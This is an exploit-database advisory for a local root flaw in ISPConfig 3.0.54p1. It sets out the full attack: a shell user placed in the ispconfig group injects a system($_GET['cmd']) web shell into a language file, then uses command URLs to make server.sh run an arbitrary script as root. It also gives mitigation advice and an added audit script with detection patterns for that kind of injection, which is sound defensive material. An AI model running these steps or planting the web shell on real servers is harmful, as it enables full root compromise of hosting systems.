Localroot vulnerability
Vendor: ISPConfig
By: mra
CVSS: 7,5 HIGH
CWE: 264
Product Name: ISPConfig
Affected Version From: 3.0.54p1
Affected Version To: 3.0.54p1
Patch Exists: NO
Related CWE: N/A
CPE: a:ispconfig:ispconfig
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu, CentOS
2014

ISPConfig 3 authenticated admin Localroot vulnerability

While logged in as the admin user, add a shell user and set its gid to ispconfig. Log in as that user and edit /usr/local/ispconfig/interface/lib/lang/en.lng to add system($_GET['cmd']). Browse to http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh, then create /tmp/script and put in it a command you wish to be executed as root. Browse to http://server:8080/index.php?cmd=chmod +x /usr/local/ispconfig/server/server.sh and http://server:8080/index.php?cmd=/usr/local/ispconfig/server/server.sh to execute the command as root. The root cause is that membership in the ispconfig group gives the shell user write access to a language file that the ISPConfig interface loads as PHP.

Mitigation:

Ensure that the ISPConfig admin user is not able to add shell users with elevated privileges. Ensure that the /usr/local/ispconfig/interface/lib/lang/en.lng file is not writable by the admin user.
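
The checks in the mitigation above can be scripted. The following audit is an added example, not ISPConfig or Exploit-DB code: it flags group/other-writable copies of the two files named in this advisory, language files that pass request input to a PHP execution function (it scans every *.lng file, not only en.lng), and extra accounts whose primary gid is the ispconfig group. The function names and the assumption that the panel's own account is called ispconfig are mine.

```shell
#!/bin/sh
# Added audit example (not ISPConfig code); paths are the ones named in the advisory.
ISP_ROOT=${ISP_ROOT:-/usr/local/ispconfig}

# True if FILE passes request input ($_GET etc.) to a PHP execution function.
has_request_exec() {
    grep -Eq '(system|exec|passthru|popen|proc_open|eval)[[:space:]]*\([^)]*\$_(GET|POST|REQUEST|COOKIE)' "$1"
}

# True if FILE is writable by its group or by others (mode string from ls).
loosely_writable() {
    case "$(ls -ld "$1" | cut -c1-10)" in
        ?????w????|????????w?) return 0 ;;
    esac
    return 1
}

# Print login names whose primary gid in a passwd(5)-format file is GID.
users_with_gid() { awk -F: -v gid="$2" '$4 == gid { print $1 }' "$1"; }

# Print the gid of GROUP from a group(5)-format file.
gid_of() { awk -F: -v g="$2" '$1 == g { print $3 }' "$1"; }

# audit ROOT PASSWD GROUP: report findings; exit status 0 only when there are none.
audit() (
    root=$1 passwd=$2 group=$3 findings=0
    for f in "$root/interface/lib/lang/en.lng" "$root/server/server.sh"; do
        [ -e "$f" ] || continue
        if loosely_writable "$f"; then
            echo "WRITABLE by group/other: $f"; findings=$((findings + 1))
        fi
    done
    for f in "$root"/interface/lib/lang/*.lng; do
        [ -e "$f" ] || continue
        if has_request_exec "$f"; then
            echo "REQUEST-DRIVEN EXEC in: $f"; findings=$((findings + 1))
        fi
    done
    gid=$(gid_of "$group" ispconfig)
    for u in $( [ -n "$gid" ] && users_with_gid "$passwd" "$gid" ); do
        # Assumption: the panel's own service account is named "ispconfig".
        if [ "$u" != ispconfig ]; then
            echo "EXTRA ACCOUNT with gid ispconfig: $u"; findings=$((findings + 1))
        fi
    done
    echo "findings: $findings"
    [ "$findings" -eq 0 ]
)

if [ "${1:-}" = "--audit" ]; then audit "$ISP_ROOT" /etc/passwd /etc/group; fi
```

Run it on the panel host with --audit; a non-zero exit status means at least one finding was printed.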

Exploit-DB raw data:

# Exploit Title: ISPConfig 3 authenticated admin Localroot vulnerability
# Date: 7/25/14
# Exploit Author: mra
# Vendor Homepage: http://wwwispconfig.org
# Version: 3.0.54p1
# Tested on: ubuntu, centos
# irc.criten.net #elite-chat


While logged in as admin user:


1) add a shell user

2) under option set gid to ispconfig

3) log in as that user

4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);


5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh


6) create /tmp/script and put a command you wish to be executed as root.